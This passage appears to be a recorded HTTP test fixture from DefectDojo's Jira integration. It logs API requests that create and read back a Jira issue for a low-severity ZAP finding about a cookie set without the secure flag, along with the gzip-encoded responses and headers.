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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 413bc5904dc2743b + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:25 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - bef02466-ce32-4656-9a48-968d5b9e5546 + x-envoy-upstream-service-time: + - '64' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - f2e1cbc38433fcbb + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - cd1f8cdd-0d89-4671-82ee-9eea0ba288ce + x-envoy-upstream-service-time: + - '102' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Jira Api Test 2", + "description": "\n\n\n\n\n\n*Title*: [Jira Api Test 2|http://localhost:8080/finding/382]\n\n*Defect + Dojo link:* http://localhost:8080/finding/382\n\n*Severity:* Low \n\n*CWE:* + [CWE-614|https://cwe.mitre.org/data/definitions/614.html]\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [1st Quarter Engagement|http://localhost:8080/engagement/1] + / [ZAP Scan|http://localhost:8080/test/110]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n*Mitigation*:\nWhenever a cookie contains sensitive + information or is a session token, then it should always be passed using an + encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n*Defect + Dojo ID:* 382\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1690' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10606","key":"NTEST-454","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10606"}' + headers: + ATL-TraceId: + - d224fd91ab3f0fb3 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4ef87cd0-2a01-4338-b398-b6a51b816b66 + x-envoy-upstream-service-time: + - '322' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-454 + response: + body: + string: !!binary | + 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 + REYY1BsAAA== + headers: + ATL-TraceId: + - ed248c375a190327 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - fd5ebdd5-5c22-4d5c-9e8c-b1d411744f76 + x-envoy-upstream-service-time: + - '165' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10606 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - ac772963c3170a7f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:26 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 17d148a1-3552-432d-8b96-35254a1b5b79 + x-envoy-upstream-service-time: + - '128' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10606"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/333/add + response: + body: + string: '{"errorMessages":["Issue does not exist or you do not have permission + to see it."],"errors":{}}' + headers: + ATL-TraceId: + - 2a9841259d78dd69 + Connection: + - close + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:27 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a4ea4ea8-0ca3-4e18-8e1c-a9fc4b8710be + x-envoy-upstream-service-time: + - '24' + status: + code: 400 + message: Bad Request +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmrTb3EQPKrIK2z2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAH5fnf7un94aa/b3Tp1 + cSLyLUEZZPCekQFn444T2tAeZ4wH7oxbhxjq1tEMvxEiU0Dwi3mvQgIZMJoDy1nVUipZLUteAMAN + RDjmPS6xtx2nK1vmQFsGknNZsqKuxB/bT49WuwjySohaU60R+bZptOJJo6I1q8SWRcFE31TNv4Jg + UsPTuCiS3tFqNeHZ9SrZJ2IuE0H7cdiT8/kHAAD//wMADVfPl1oBAAA= + headers: + ATL-TraceId: + - 77482d9b01e86115 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 31a6c72e-5f75-43e6-9ba7-eafebe03c46f + x-envoy-upstream-service-time: + - '34' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + H4sIAAAAAAAAA7SW327aMBTGXyXyNVTdboa47TQJqZqmtuouEJpMOAS3iYNshxZVfZq9z55px7Hj + P8RhHS0XVZXPh5zv9/lgPH8hbEWmRCqqGplTBUUt9vmG8gJW+ERG5BH2xws4rQArbtuK7MqWZFem + BgvyRqq6ItM1LSWMSC1WIOiyBKdwumOFUZRoUJBABfYIlLykjYTv2EqS6dza6XrZVl+1nwV+Ot9A + Rcn0haj9VlvTRhWrtFm5lwqqY0CvryMbCpOygfYVXQqhYrFnWsrujDZMaij+HzTs2P5L8YVFDtCL + nmhLBXDlcNyjZfnRPQ9zvGXHbM0BiW22cGb0jsht6CdUrKU7lLJbq53Dlu+ZSpY31RJEGKuvD2IV + 